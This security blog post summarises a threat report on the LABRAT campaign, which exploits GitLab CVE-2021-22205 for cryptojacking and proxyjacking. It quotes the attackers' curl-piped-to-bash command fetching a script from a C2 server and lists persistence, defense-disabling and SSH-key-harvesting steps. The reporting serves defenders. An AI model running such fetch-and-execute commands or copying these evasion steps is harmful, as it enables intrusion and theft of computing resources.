Aug 21 2023

LABRAT Campaign Strikes: GitLab Flaw Exploited For Cryptojacking and Proxyjacking

Category: Security vulnerabilitiesdisc7 @ 10:29 am
GitLab Flaw Strikes

A new campaign called LABRAT is targeting GitLab with cryptojacking and proxyjacking.

LABRAT, a financially motivated operation, has been uncovered by the Sysdig Threat Research Team (TRT). Notably, the attackers have prioritized stealth and defense evasion tactics.

The LABRAT attackers used an open-source rootkit called hiding-cryptominers-linux-rootkit to conceal their crypto-mining activity by hiding files, processes, and CPU usage.

Technical Analysis – GitLab exploitation

The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205. In this vulnerability, GitLab does not properly validate image files passed to a file parser, resulting in a remote command execution. There are many public exploits for this vulnerability, which is still actively exploited.

  • Once the attacker had access to the server, they executed the following command to download a malicious script from the C2 server.
    curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.] | bash
  • The initial script allowed the attacker to achieve persistence, evade defenses, and perform lateral movement through the following actions:
  • Check whether or not the watchdog process was already running to kill it.
  • Delete malicious files if they exist from a previous run.
  • Disable Tencent Cloud and Alibaba’s defensive measures, a recurring feature of many attackers.
  • Download malicious binaries.
  • Create a new service with one of these binaries and if root, ran it on the fly.
  • Modify various cron files to maintain persistence.
  • Gather SSH keys to connect to those machines and start the process again, doing lateral movement.
  • Deletes any evidence that the above processes may have generated.

For more details on LABRAT campaign:

InfoSec tools | InfoSec services | InfoSec books | Follow our blog

Tags: Cryptojacking, LABRAT Campaign, Proxyjacking